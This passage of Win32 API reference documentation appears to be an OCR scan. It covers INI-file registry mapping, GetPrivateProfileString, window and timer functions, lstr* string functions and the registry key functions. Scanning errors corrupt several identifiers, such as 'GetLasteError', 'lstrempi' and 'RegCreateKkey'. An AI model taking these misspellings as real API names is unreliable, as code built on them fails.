1. Look in the registry for the name of the initialization file, say myfile.ini, 
under IniFileMapping: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping\myfile.ini 


2. Look for the section name specified by lpAppName. This will be a named value 
under myfile.ini, or a subkey of myfile.ini, or will not exist. 


3. If the section name specified by lpAppName is a named value under myfile.ini, 
then that value specifies where in the registry you will find the keys for the 
section. 


4. If the section name specified by lpAppName is a subkey of myfile.ini, then 
named values under that subkey specify where in the registry you will find the 
keys for the section. If the key you are looking for does not exist as a named 
value, then there will be an unnamed value (shown as "<No Name>") that specifies 
the default location in the registry where you will find the key. 


5. If the section name specified by lpAppName does not exist as a named value or 
as a subkey under myfile.ini, then there will be an unnamed value (shown as "<No 
Name>") under myfile.ini that specifies the default location in the registry 
where you will find the keys for the section. 


6. If there is no subkey for myfile.ini, or if there is no entry for the section 
name, then look for the actual myfile.ini on the disk and read its contents. 


when looking at values in the registry that specify other registry locations, 
there are several prefixes that change the behavior of the ini file mapping: 


! - this character forces all writes to go both to the registry and to the .INI 
file on disk. 


# - this character causes the registry value to be set to the value in the 
Windows 3.1 .INI file when a new user logs in for the first time after setup. 


@ - this character prevents any reads from going to the .INI file on disk if the 
requested data is not found in the registry. 


USR: - this prefix stands for HKEY_CURRENT_USER, and the text after the prefix 
is relative to that key. 


SYS: - this prefix stands for HKEY_LOCAL _MACHINE\SOFTWARE, and the text after 
the prefix is relative to that key. 


See Also 


GetProfileInt 


GetPrivateProfileString 


The GetPrivateProfileString function retrieves a string from the specified 
section in an initialization file. This function is provided for compatibility 
with 16-bit Windows-based applications. Win32-based applications should store 
initialization information in the registry. 


DWORD GetPrivateProfileString( 

LPCTSTR lpAppName, // points to section name 
LPCTSTR lpKeyName, // points to key name 

LPCTSTR lpDefault, // points to default string 


LPTSTR lpReturnedString, // points to destination buffer 
DWORD nSize, // size of destination buffer 
LPCTSTR lpFileName // points to initialization filename 


); 
Parameters 
lpAppName 


Points to a null-terminated string that specifies the section containing the key 
name. If this parameter is NULL, the GetPrivateProfileString function copies all 
section names in the file to the supplied buffer. 


lpKeyName 


Pointer to the null-terminated string containing the key name whose associated 
string is to be retrieved. If this parameter is NULL, all key names in the 
section specified by the lpAppName parameter are copied to the buffer specified 
by the lpReturnedString parameter. 


lpDefault 


Pointer to a null-terminated default string. If the lpKeyName key cannot be 
found in the initialization file, GetPrivateProfileString copies the default 
string to the lpReturnedString buffer. This parameter cannot be NULL. 


Avoid specifying a default string with trailing blank characters. The function 
inserts a null character in the lpReturnedString buffer to strip any trailing 
blanks. 

Windows 95: Although lpDefault is declared as a constant parameter, Windows 95 
strips any trailing blanks by inserting a null character into the lpDefault 
string before copying it to the lpReturnedstring buffer. 


Windows NT: Windows NT does not modify the lpDefault string. This means that if 
the default string contains trailing blanks, the lpReturnedstring and lpDefault 
strings will not match when compared using the lstrcmp function. 
lpReturnedString 

Pointer to the buffer that receives the retrieved string. 


nsize 


Specifies the size, in characters, of the buffer pointed to by the 
lpReturnedString parameter. 


lpFileName 


Pointer to a null-terminated string that names the initialization file. If this 
parameter does not contain a full path to the file, Windows searches for the 
file in the Windows directory. 


Return Values 


If the function succeeds, the return value is the number of characters copied to 
the buffer, not including the terminating null character. 


If neither lpAppName nor lpKeyName is NULL and the supplied destination buffer 
is too small to hold the requested string, the string is truncated and followed 
by a null character, and the return value is equal to nSize minus one. 


If either lpAppName or lpKeyName is NULL and the supplied destination buffer is 
too small to hold all the strings, the last string is truncated and followed by 
two null characters. In this case, the return value is equal to nSize minus two. 


Remarks 


The GetPrivateProfileString function searches the specified initialization file 
for a key that matches the name specified by the lpKeyName parameter under the 
section heading specified by the lpAppName parameter. If it finds the key, the 
function copies the corresponding string to the buffer. If the key does not 
exist, the function copies the default character string specified by the 
lpDefault parameter. A section in the initialization file must have the 
following form: 


[section] 
key=string 


If lpAppName is NULL, GetPrivateProfileString copies all section names in the 
specified file to the supplied buffer. If lpKeyName is NULL, the function copies 
all key names in the specified section to the supplied buffer. An application 
can use this method to enumerate all of the sections and keys in a file. In 
either case, each string is followed by a null character and the final string is 
followed by a second null character. If the supplied destination buffer is too 
small to hold all the strings, the last string is truncated and followed by two 
null characters. 


If the string associated with lpKeyName is enclosed in single or double 
quotation marks, the marks are discarded when the GetPrivateProfileString 
function retrieves the string. 


The GetPrivateProfileString function is not case-sensitive; the strings can be a 
combination of uppercase and lowercase letters. 


To retrieve a string from the WIN.INI file, use the GetProfileString function. 

Windows NT: 

Calls to private profile functions may be mapped to the registry instead of to 

the specified initialization files. This mapping occurs when the initialization 


file and section are specified in the registry under the following keys: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping 


This mapping is likely if an application modifies system-component 
initialization files, such as CONTROL.INI, SYSTEM.INI, and WINFILE.,INI. In these 
cases, the GetPrivateProfileString function retrieves information from the 
registry, not from the initialization file; the change in the storage location 
has no effect on the function's behavior. 


The Win32 Profile functions (Get/WriteProfile*, Get/WritePrivateProfile*) use 
the following steps to locate initialization information: 


1. Look in the registry for the name of the initialization file, say myfile.ini, 
under IniFileMapping: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows NT\CurrentVersion\IniFileMapping\myfile.ini 


2. Look for the section name specified by lpAppName. This will be a named value 
under myfile.ini, or a subkey of myfile.ini, or will not exist. 


3. If the section name specified by lpAppName is a named value under myfile.ini, 
then that value specifies where in the registry you will find the keys for the 
section. 


4. If the section name specified by lpAppName is a subkey of myfile.ini, then 
named values under that subkey specify where in the registry you will find the 
keys for the section. If the key you are looking for does not exist as a named 
value, then there will be an unnamed value (shown as "<No Name>") that specifies 
the default location in the registry where you will find the key. 


5. If the section name specified by lpAppName does not exist as a named value or 
as a subkey under myfile.ini, then there will be an unnamed value (shown as "<No 


Name>") under myfile.ini that specifies the default location in the registry 
where you will find the keys for the section. 


6. If there is no subkey for myfile.ini, or if there is no entry for the section 
name, then look for the actual myfile.ini on the disk and read its contents. 


when looking at values in the registry that specify other registry locations, 
there are several prefixes that change the behavior of the ini file mapping: 


! - this character forces all writes to go both to the registry and to the .INI 
file on disk. 


# - this character causes the registry value to be set to the value in the 
Windows 3.1 .INI file when a new user logs in for the first time after setup. 
@ - this character prevents any reads from going to the .INI file on disk if the 


requested data is not found in the registry. 


USR: - this prefix stands for HKEY_CURRENT_USER, and the text after the prefix 
is relative to that key. 


SYS: - this prefix stands for HKEY_LOCAL _MACHINE\SOFTWARE, and the text after 
the prefix is relative to that key. 


See Also 


GetProfileSint 


GetSystemTime 


The GetSystemTime function retrieves the current system date and time. The 
system time is expressed in Coordinated Universal Time (UTC). 


VOID GetSystemTime( 
LPSYSTEMTIME lpSystemTime // address of system time structure 


); 

Parameters 

lpSystemTime 

Points to a SYSTEMTIME structure to receive the current system date and time. 
Return Values 

This function does not return a value. 

See Also 


GetLocalTime, GetSystemTimeAdjustment, SetSystemTime, SYSTEMTIME 
GetSystemTimeAsFileTime 


The GetSystemTimeAsFileTime function obtains the current system date and time. 
The information is in Coordinated Universal Time (UTC) format. 


VOID GetSystemTimeAsFileTime( 
LPFILETIME lpSystemTimeAsFileTime // pointer to a file time structure 


); 
Parameters 
lpSystemTimeAsFileTime 


Pointer to a FILETIME structure to receive the current system date and time in 
UTC format. 


Return Values 
This function does not return a value. 
Remarks 


The GetSystemTimeAsFileTime function is equivalent to the following code 
sequence: 


FILETIME ft; 
SYSTEMTIME st; 


GetSystemTime(&St); 
SystemTimeToFileTime(&st,&ft); 


See Also 

FILETIME, GetSystemTime, SYSTEMTIME, SystemTimeToFileTime 

GetWindowLong 

The GetWindowLong function retrieves information about the specified window. The 


function also retrieves the 32-bit (long) value at the specified offset into the 
extra window memory of a window. 


LONG GetWindowLong( 
HWND hwnd, // handle of window 
int nIndex // offset of value to retrieve 


); 

Parameters 

hwnd 

Identifies the window and, indirectly, the class to which the window belongs. 
nIndex 


Specifies the zero-based offset to the value to be retrieved. Valid values are 
in the range zero through the number of bytes of extra window memory, minus 
four; for example, if you specified 12 or more bytes of extra memory, a value of 
8 would be an index to the third 32-bit integer. To retrieve any other value, 
specify one of the following values: 


GWL_EXSTYLE 
Retrieves the extended window styles. 


GWL_STYLE 
Retrieves the window styles. 


GWL_WNDPROC 

Retrieves the address of the window procedure, or a handle representing the 
address of the window procedure. You must use the CallWindowProc function to 
call the window procedure. 


GWL_HINSTANCE 
Retrieves the handle of the application instance. 


GWL_HWNDPARENT 
Retrieves the handle of the parent window, if any. 


GWL_ID 
Retrieves the identifier of the window. 


GWL_USERDATA 

Retrieves the 32-bit value associated with the window. Each window has a 
corresponding 32-bit value intended for use by the application that created the 
window. 


The following values are also available when the hwnd parameter identifies a 
dialog box: 


DWL_DLGPROC 

Retrieves the address of the dialog box procedure, or a handle representing the 
address of the dialog box procedure. You must use the CallWindowProc function to 
call the dialog box procedure. 


DWL_MSGRESULT 
Retrieves the return value of a message processed in the dialog box procedure. 


DWL_USER 
Retrieves extra information private to the application, such as handles or 
pointers. 


Return Values 
If the function succeeds, the return value is the requested 32-bit value. 


If the function fails, the return value is zero. To get extended error 
information, call GetLasteError. 


Remarks 

Reserve extra window memory by specifying a nonzero value in the cbwndExtra 
member of the WNDCLASS structure used with the RegisterClass function. 

See Also 

CallwindowProc, GetWindowword, RegisterClass, SetParent 

GetWindowText 

The GetWindowText function copies the text of the specified window's title bar 
(if it has one) into a buffer. If the specified window is a control, the text of 
the control is copied. 

int GetWindowText( 

HWND hwnd, // handle of window or control with text 


LPTSTR lpString, // address of buffer for text 
int nMaxCount // maximum number of characters to copy 


); 
Parameters 
hwnd 


Identifies the window or control containing the text. 


lpString 
Points to the buffer that will receive the text. 
nMaxCount 


Specifies the maximum number of characters to copy to the buffer, including the 
NULL character. If the text exceeds this limit, it is truncated. 


Return Values 


If the function succeeds, the return value is the length, in characters, of the 
copied string, not including the terminating null character. If the window has 
no title bar or text, if the title bar is empty, or if the window or control 
handle is invalid, the return value is zero. To get extended error information, 
call GetLasteError. 


This function cannot retrieve the text of an edit control in another 
application. 
Remarks 


This function causes a WM_GETTEXT message to be sent to the specified window or 
control. 


This function cannot retrieve the text of an edit control in another 
application. 


See Also 
GetWindowTextLength 
GetWindowTextLength 


The GetWindowTextLength function retrieves the length, in characters, of the 
specified window's title bar text (if the window has a title bar). If the 
specified window is a control, the function retrieves the length of the text 
within the control. 


int GetWindowTextLength( 
HWND hwnd // handle of window or control with text 


); 

Parameters 

hwnd 

Identifies the window or control. 


Return Values 


If the function succeeds, the return value is the length, in characters, of the 
text. Under certain conditions, this value may actually be greater than the 
length of the text. For more information, see the following Remarks section. 


If the window has no text, the return value is zero. To get extended error 
information, call GetLasteError. 


Remarks 


This function causes a WM_GETTEXTLENGTH message to be sent to the specified 
window or control. 


Under certain conditions, the GetWindowTextLength function may return a value 
that is larger than the actual length of the text. This occurs with certain 
mixtures of ANSI and Unicode, and is due to the operating system allowing for 
the possible existence of DBCS characters within the text. The return value, 
however, will always be at least as large as the actual length of the text; you 
can thus always use it to guide buffer allocation. This behavior can occur when 
an application uses both ANSI functions and common dialogs, which use Unicode. 
It can also occur when an application uses the ANSI flavor of 
GetWindowTextLength with a window whose window procedure is Unicode, or the 
Unicode flavor with a window whose window procedure is ANSI. 


To obtain the exact length of the text, use the WM_GETTEXT, LB_GETTEXT, or 
CB_GETLBTEXT messages, or the GetWindowText function. 
See Also 


CB_GETLBTEXT, GetWindowText, LB_GETTEXT, SetWindowText 


CharUpper 


The CharUpper function converts a character string or a single character to 
uppercase. If the operand is a character string, the function converts the 
characters in place. This function supersedes the AnsiUpper function. 


LPTSTR CharUpper( 
LPTSTR lpsz // single character or pointer to string 


); 
Parameters 
lpsz 


Pointer to a null-terminated string or specifies a single character. If the 
high-order word of this parameter is zero, the low-order word must contain a 
single character to be converted. 


Return Values 


If the operand is a character string, the function returns a pointer to the 
converted string. Since the string is converted in place, the return value is 
equal to lpsz. 


If the operand is a single character, the return value is a 32-bit value whose 
high-order word is zero, and low-order word contains the converted character. 


There is no indication of success or failure. Failure is rare. 
Remarks 


Windows NT: To make the conversion, the function uses the language driver for 
the current language selected by the user at setup or by using the Control 
Panel. If no language has been selected, Windows completes the conversion by 
using internal default mapping. The conversion is made based on the code page 
associated with the process locale. 


Windows 95: The function makes the conversion based on the information 
associated with the user's default locale, which is the locale selected by the 
user at setup or by using the Control Panel. Windows 95 does not have language 
drivers. 


See Also 
CharLower 
CharLower 
The CharLower function converts a character string or a single character to 
lowercase. If the operand is a character string, the function converts the 


characters in place. This function supersedes the AnsiLower function. 


LPTSTR CharLower ( 
LPTSTR lpsz // single character or pointer to string 


); 

Parameters 

lpsz 

Pointer to a null-terminated string or specifies a single character. If the 


high-order word of this parameter is zero, the low-order word must contain a 
single character to be converted. 


Return Values 


If the operand is a character string, the function returns a pointer to the 
converted string. Since the string is converted in place, the return value is 
equal to lpsz. 


If the operand is a single character, the return value is a 32-bit value whose 
high-order word is zero, and low-order word contains the converted character. 


There is no indication of success or failure. Failure is rare. 
Remarks 


Windows NT: To make the conversion, the function uses the language driver for 
the current language selected by the user at setup or by using the Control 
Panel. If no language has been selected, Windows completes the conversion by 
using internal default mapping. The conversion is made based on the code page 
associated with the process locale. 


Windows 95: The function makes the conversion based on the information 
associated with the user's default locale, which is the locale selected by the 
user at setup or by using the Control Panel. Windows 95 does not have language 
drivers. 


See Also 
CharLowerBuff, CharUpper 
CreateDialog 


The CreateDialog macro creates a modeless dialog box from a dialog box template 
resource. The CreateDialog macro uses the CreateDialogParam function. 


HWND CreateDialog( 

HINSTANCE hInstance, // handle to application instance 
LPCTSTR lpTemplate, // identifies dialog box template name 
HWND hwndParent, // handle to owner window 

DLGPROC lpDialogFunc // pointer to dialog box procedure 


); 
Parameters 
hInstance 


Identifies an instance of the module whose executable file contains the dialog 
box template. 


lpTemplate 


Identifies the dialog box template. This parameter is either the pointer to a 
null-terminated character string that specifies the name of the dialog box 
template or an integer value that specifies the resource identifier of the 
dialog box template. If the parameter specifies a resource identifier, its high- 
order word must be zero and its low-order word must contain the identifier. You 
can use the MAKEINTRESOURCE macro to create this value. 


hwndParent 


Identifies the window that owns the dialog box. 


lpDialogFunc 


Points to the dialog box procedure. For more information about the dialog box 
procedure, see DialogProc. 


Return Values 


If the function succeeds, the return value is the handle to the dialog box. 
If the function fails, the return value is NULL. 


Remarks 


The CreateDialog function uses the CreateWindowEx function to create the dialog 
box. CreateDialog then sends a WM_INITDIALOG message (and a WM_SETFONT message 
if the template specifies the DS_SETFONT style) to the dialog box procedure. The 
function displays the dialog box if the template specifies the WS_VISIBLE style. 
Finally, CreateDialog returns the window handle to the dialog box. 

After CreateDialog returns, the application displays the dialog box (if it is 
not already displayed) by using the Showwindow function. The application 
destroys the dialog box by using the DestroyWindow function. 

Windows 95: The system can support a maximum of 16,364 window handles. 


See Also 
CreateDialogIndirect, CreateDialogIndirectParam, CreateDialogParam, 


CreateWindowEx, DestroyWindow, DialogBox, DialogProc, Showwindow, WM_INITDIALOG, 
WM_SETFONT 


KillTimer 
The KillTimer function destroys the specified timer. 
BOOL KillTimer( 


HWND hwnd, // handle of window that installed timer 
UINT uIDEvent // timer identifier 


); 

Parameters 

hwnd 

Identifies the window associated with the specified timer. This value must be 
the same as the hWnd value passed to the SetTimer function that created the 
timer. 

uIDEvent 

Specifies the timer to be destroyed. If the window handle passed to SetTimer is 
valid, this parameter must be the same as the uIDEvent value passed to SetTimer. 
If the application calls SetTimer with hwnd set to NULL, this parameter must be 
the timer identifier returned by SetTimer. 


Return Values 


If the function succeeds, the return value is nonzero. 


If the function fails, the return value is zero. To get extended error 
information, call GetLasteError. 


Remarks 


The KillTimer function does not remove WM_TIMER messages already posted to the 
message queue. 


See Also 


SetTimer 


lstrcat 


The lstrcat function appends one string to another. 


LPTSTR lstrcat( 


LPTSTR lpStringi1, // address of buffer for concatenated strings 
LPCTSTR lpString2 // address of string to add to stringi 

); 

Parameters 

lpStringi 


Points to a null-terminated string. The buffer must be large enough to contain 
both strings. 


lpString2 


Points to the null-terminated string to be appended to the string specified in 
the lpString1 parameter. 


Return Values 

If the function succeeds, the return value is a pointer to the buffer. 
If the function fails, the return value is NULL. To get extended error 
information, call GetLasteError. 

See Also 

lstrcmp 

lstrcmpi 


The lstrempi function compares two character strings. The comparison is not case 
sensitive. 


int lstrcmpi( 


LPCTSTR lpStringi, // address of first string 
LPCTSTR lpString2 // address of second string 
); 

Parameters 


lpStringi 


Points to the first null-terminated string to be compared. 
lpString2 

Points to the second null-terminated string to be compared. 
Return Values 


If the function succeeds and the string pointed to by lpString1 is less than the 
string pointed to by lpString2, the return value is negative; if the string 
pointed to by lpString1 is greater than the string pointed to by lpString2, it 
is positive. If the strings are equal, the return value is zero. 


Remarks 


The lstrcempi function compares two strings by checking the first characters 
against each other, the second characters against each other, and so on until it 
finds an inequality or reaches the ends of the strings. 


The function returns the difference of the values of the first unequal 
characters it encounters. For example, lstrcmpi determines that "abcz" is 
greater than "abcdefg" and returns the difference of z and d. 


The language (locale) selected by the user at setup time, or by using the 
control panel, determines which string is greater (or whether the strings are 
the same). If no language (locale) is selected, Windows performs the comparison 
by using default values. 


For some locales, the lstrcmpi function may be insufficient. If this occurs, use 
CompareString to ensure proper comparison. For example, in Japan call 
CompareString with the IGNORE_CASE, IGNORE_KANATYPE, and IGNORE_WIDTH values to 
achieve the most appropriate non-exact string comparison. The IGNORE_KANATYPE 
and IGNORE_WIDTH values are ignored in non-Asian locales, so you can set these 
values for all locales and be guaranteed to have a culturally correct 
"insensitive" sorting regardless of the locale. Note that specifying these 
values slows performance, so use them only when necessary. 


With a double-byte character set (DBCS) version of Windows, this function can 
compare two DBCS strings. 

The Win32 lstrcmpi function uses a word sort, rather than a string sort. A word 
sort treats hyphens and apostrophes differently than it treats other symbols 
that are not alphanumeric, in order to ensure that words such as "coop" and "co- 
op" stay together within a sorted list. Note that in 16-bit versions of Windows, 
lstrempi uses a string sort. For a detailed discussion of word sorts and string 
sorts, see the Remarks section of the reference page for the CompareString 
function 

See Also 


CompareString, lstrcemp 


lstrcpy 
The lstrcpy function copies a string to a buffer. 
LPTSTR lstrcpy( 


LPTSTR lpStringi, // address of buffer 


LPCTSTR lpString2 // address of string to copy 
); 


Parameters 

lpStringi 

Points to a buffer to receive the contents of the string pointed to by the 
lpString2 parameter. The buffer must be large enough to contain the string, 
including the terminating null character. 

lpString2 

Points to the null-terminated string to be copied. 

Return Values 

If the function succeeds, the return value is a pointer to the buffer. 

If the function fails, the return value is NULL. To get extended error 
information, call GetLasteError. 


Remarks 


With a double-byte character set (DBCS) version of Windows, this function can be 
used to copy a DBCS string. 


See Also 

lstrcat, lstrcpyn 

lstrcpyn 

The lstrcpyn function copies a specified number of characters from a source 


string into a buffer. 


LPTSTR lstrcpyn( 


LPTSTR lpStringi1, // address of target buffer 

LPCTSTR lpString2, // address of source string 

int iMaxLength // number of bytes or characters to copy 
); 

Parameters 

lpStringi 


Points to a buffer into which the function copies characters. The buffer must be 
large enough to contain the number of bytes (ANSI version) or characters 
(Unicode version) specified by iMaxLength, including room for a terminating null 
character. 


lpString2 


Points to a null-terminated string from which the function copies characters. 


iMaxLength 


Specifies the number bytes (ANSI version) or characters (Unicode version) to be 
copied from the string pointed to by lpString2 into the buffer pointed to by 
lpString1, including a terminating null character. 

Return Values 

If the function succeeds, the return value is a pointer to the buffer. 

If the function fails, the return value is NULL. To get extended error 
information, call GetLasteError. 

Remarks 

Note that the buffer pointed to by lpStringi must be large enough to include a 
terminating null character, and the string length value specified by iMaxLength 
includes room for a terminating null character. Thus, the following code 

TCHAR chBuffer[512] ; 

lstrcpyn(chBuffer, "abcdefghijklmnop", 4) ; 


. copies the string "abc", followed by a terminating null character, to 
chBuffer. 


See Also 
lstrcat, lstrcpy 


RegCreateKey 


The RegCreateKey function creates the specified key. If the key already exists 
in the registry, the function opens it. This function is provided for 
compatibility with Windows version 3.1. Win32-based applications should use the 
RegCreateKeyEx function. 


LONG RegCreateKey( 


HKEY hKey, // handle of an open key 
LPCTSTR lpSubKey, // address of name of subkey to open 
PHKEY phkResult // address of buffer for opened handle 


); 
Parameters 
hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 


The key opened or created by this function is a subkey of the key identified by 
hKey. 


lpSubKey 


Points to a null-terminated string specifying the name of a key that this 
function opens or creates. This key must be a subkey of the key identified by 
the hKey parameter. 

If hKey is one of the predefined keys, lpSubKey may be NULL. In that case, the 
handle returned by using phkResult is the same hKey handle passed in to the 
function. 

phkResult 

Points to a variable that receives the handle of the opened or created key. 
Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 
Remarks 

An application can use the RegCreateKey function to create several keys at once. 
For example, an application can create a subkey four levels deep at the same 
time as the three preceding subkeys by specifying a string of the following form 
for the lpSubKey parameter: 

subkey1\subkey2\subkey3\subkey4 


The key identified by the hKey parameter must have been opened with 
KEY_CREATE_SUB_KEY access (KEY_WRITE access includes KEY_CREATE_SUB_KEY access). 


If the lpSubKey parameter is the address of an empty string, the function opens 
and then passes back the key identified by the hKey parameter. 


See Also 

RegCloseKey, RegCreateKeyEx, RegDeleteKkey, RegOpenKey 

RegCloseKey 

The RegCloseKey function releases the handle of the specified key. 
LONG RegCloseKey( 


HKEY hkey // handle of key to close 
); 


Parameters 

hKey 

Identifies the open key to close. 

Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 


WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


The handle for a specified key should not be used after it has been closed, 
because it will no longer be valid. Key handles should not be left open any 
longer than necessary. 


The RegCloseKey function does not necessarily write information to the registry 
before returning; it can take as much as several seconds for the cache to be 
flushed to the hard disk. If an application must explicitly write registry 
information to the hard disk, it can use the RegFlushkey function. RegFlushKey, 
however, uses many system resources and should be called only when necessary. 
See Also 


RegCreateKkey, RegCreateKeyEx, RegDeleteKey, RegFlushKey, RegOpenKey, 
RegOpenKeyEx, RegSetValue, RegSetValueEx 


RegCreateKeyEx 


The RegCreateKeyEx function creates the specified key. If the key already exists 
in the registry, the function opens it. 


LONG RegCreateKeyEx( 


HKEY hKey, // handle of an open key 

LPCTSTR lpSubKey, // address of subkey name 

DWORD Reserved, // reserved 

LPTSTR lpClass, // address of class string 

DWORD dwOptions, // special options flag 

REGSAM samDesired, // desired security access 
LPSECURITY_ATTRIBUTES lpSecurityAttributes, // address of key security 
structure 

PHKEY phkResult, // address of buffer for opened handle 
LPDWORD lpdwbisposition // address of disposition value buffer 
); 

Parameters 

hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 


The key opened or created by the RegCreateKkeyEx function is a subkey of the key 
identified by the hKey parameter. 


lpSubKey 


Points to a null-terminated string specifying the name of a subkey that this 
function opens or creates. The subkey specified must be a subkey of the key 
identified by the hKey parameter. This subkey must not begin with the backslash 
character ('\'). This parameter cannot be NULL. 


Reserved 
Reserved; must be zero. 
lpClass 


Points to a null-terminated string that specifies the class (object type) of 
this key. This parameter is ignored if the key already exists. 


dwOptions 


Specifies special options for the key. This parameter can be one of the 
following values. 


REG_OPTION_NON_VOLATILE 

This key is not volatile; this is the default. The information is stored in a 
file and is preserved when the system is restarted. The RegSaveKey function 
saves keys that are not volatile. 


REG_OPTION_VOLATILE 

Windows NT: This key is volatile; the information is stored in memory and is not 
preserved when the system is restarted. The RegSaveKey function does not save 
volatile keys. This flag is ignored if the key already exists. 


Windows 95: This value is ignored in Windows 95. If REG_OPTION_VOLATILE is 
specified, the RegCreateKeyEx function creates a nonvolatile key and returns 
ERROR_SUCCESS. 


REG_OPTION_BACKUP_RESTORE 

Windows NT: If this flag is set, the function ignores the samDesired parameter 
and attempts to open the key with the access required to backup or restore the 
key. If the calling thread has the SE_BACKUP_NAME privilege enabled, the key is 
opened with ACCESS_SYSTEM_SECURITY and KEY_READ access. If the calling thread 
has the SE_RESTORE_NAME privilege enabled, the key is opened with 
ACCESS_SYSTEM_SECURITY and KEY_WRITE access. If both privileges are enabled, the 
key has the combined accesses for both privileges. 

Windows 95: This flag is ignored. Windows 95 does not support security in its 
registry. 


samDesired 


Specifies an access mask that specifies the desired security access for the new 
key. This parameter can be a combination of the following values: 


KEY _ALL_ACCESS 
Combination of KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, KEY_NOTIFY, 
KEY_CREATE_SUB_KEY, KEY_CREATE_LINK, and KEY_SET_VALUE access. 


KEY_CREATE_LINK 
Permission to create a symbolic link. 


KEY_CREATE_SUB_KEY 
Permission to create subkeys. 


KEY_ENUMERATE_SUB_KEYS 
Permission to enumerate subkeys. 


KEY_EXECUTE 
Permission for read access. 


KEY_NOTIFY 


Permission for change notification. 


KEY_QUERY_VALUE 
Permission to query subkey data. 


KEY_READ 
Combination of KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS, and KEY_NOTIFY access. 


KEY_SET_VALUE 
Permission to set subkey data. 


KEY_WRITE 


Combination of KEY_SET_VALUE and KEY_CREATE_SUB_KEY access. 


lpSecurityAttributes 

Pointer to a SECURITY _ATTRIBUTES structure that determines whether the returned 
handle can be inherited by child processes. If lpSecurityAttributes is NULL, the 
handle cannot be inherited. 

Windows NT: The lpSecurityDescriptor member of the structure specifies a 
security descriptor for the new key. If lpSecurityAttributes is NULL, the key 
gets a default security descriptor. 


Windows 95: The lpSecurityDescriptor member of the structure is ignored. 


phkResult 

Points to a variable that receives the handle of the opened or created key. 
lpdwDisposition 

Points to a variable that receives one of the following disposition values: 


REG_CREATED_NEW_KEY 
The key did not exist and was created. 


REG_OPENED_EXISTING_KEY 
The key existed and was simply opened without being changed. 


Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


The key that the RegCreateKkeyEx function creates has no values. An application 
can use the RegSetValue or RegSetValueEx function to set key values. 


The key identified by the hKey parameter must have been opened with 
KEY_CREATE_SUB_KEY access. To open the key, use the RegCreateKeyEx or 
RegOpenKeyEx function. 


An application cannot create a key under HKEY_USERS or HKEY_LOCAL_MACHINE. 


An application can use RegCreateKeyEx to temporarily lock a portion of the 
registry. When the locking process creates a new key, it receives the 
disposition value REG_CREATED_NEW_ KEY, indicating that it "owns" the lock. 
Another process attempting to create the same key receives the disposition value 
REG_OPENED_EXISTING_KEY, indicating that another process already owns the lock. 


See Also 


RegCloseKey, RegCreateKey, RegDeleteKey, RegOpenkey, RegOpenKeyEx 


RegDeleteKey 


Windows 95: The RegDeleteKey function deletes a key and all its descendents. 


Windows NT: The RegDeleteKey function deletes the specified key. This function 
cannot delete a key that has subkeys. 


LONG RegDeleteKey( 


HKEY hKey, // handle of open key 
LPCTSTR lpSubKey // address of name of subkey to delete 


Li 
Parameters 
hKey 


Identifies a currently open key or any of the following predefined reserved 
handle values: 


HKEY_CLASSES_ROOT 
HKEY_CURRENT_USER 
HKEY_LOCAL_MACHINE 
HKEY_USERS 


The key specified by the lpSubKey parameter must be a subkey of the key 
identified by hKey. 


lpSubKey 

Points to a null-terminated string specifying the name of the key to delete. 
This parameter cannot be NULL, and the specified key must not have subkeys. 
Return Values 

If the function succeeds, the return value is ERROR_SUCCESS, 

If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


If the function succeeds, RegDeleteKey removes the specified key from the 
registry. The entire key, including all of its values, is removed. 


To open the key, use the RegCreateKeyEx or RegOpenKeyEx function. Do not use the 
RegCreateKkey or RegOpenKkey functions. 


See Also 

RegCloseKey 

RegLoadKey 

The RegLoadKey function creates a subkey under HKEY_USER or HKEY_LOCAL_MACHINE 
and stores registration information from a specified file into that subkey. This 
registration information is in the form of a hive. A hive is a discrete body of 


keys, subkeys, and values that is rooted at the top of the registry hierarchy. A 
hive is backed by a single file and .LOG file. 


LONG RegLoadKey( 


HKEY hKey, // handle of open key 

LPCTSTR lpSubKey, // address of name of subkey 

LPCTSTR lpFile // address of filename for registry information 
); 

Parameters 

hKey 


Specifies the key where the subkey will be created. This can be a predefined 
reserved handle value, or a handle returned by a call to RegConnectRegistry. The 
predefined reserved handle values are: 


HKEY_LOCAL_MACHINE 
HKEY_USERS 


This function always loads information at the top of the registry hierarchy. The 
HKEY_CLASSES_ROOT and HKEY_CURRENT_USER handle values cannot be specified for 
this parameter, because they represent subsets of the HKEY_LOCAL_MACHINE and 
HKEY_USERS handle values, respectively. 


lpSubKey 

Points to a null-terminated string that specifies the name of the key to be 
created under hKey. This subkey is where the registration information from the 
file will be loaded. 

lpFile 

Points to a null-terminated string containing the name of a file that has 
registration information. This file must have been created with the RegSaveKey 
function. Under the file allocation table (FAT) file system, the filename may 


not have an extension. 


Return Values 


If the function succeeds, the return value is ERROR_SUCCESS, 
If the function fails, the return value is a nonzero error code defined in 
WINERROR.H. You can use the FormatMessage function with the 
FORMAT_MESSAGE_FROM_SYSTEM flag to get a generic description of the error. 


Remarks 


If hKey is a handle returned by RegConnectRegistry, then the path specified in 
lpFile is relative to the remote computer. 


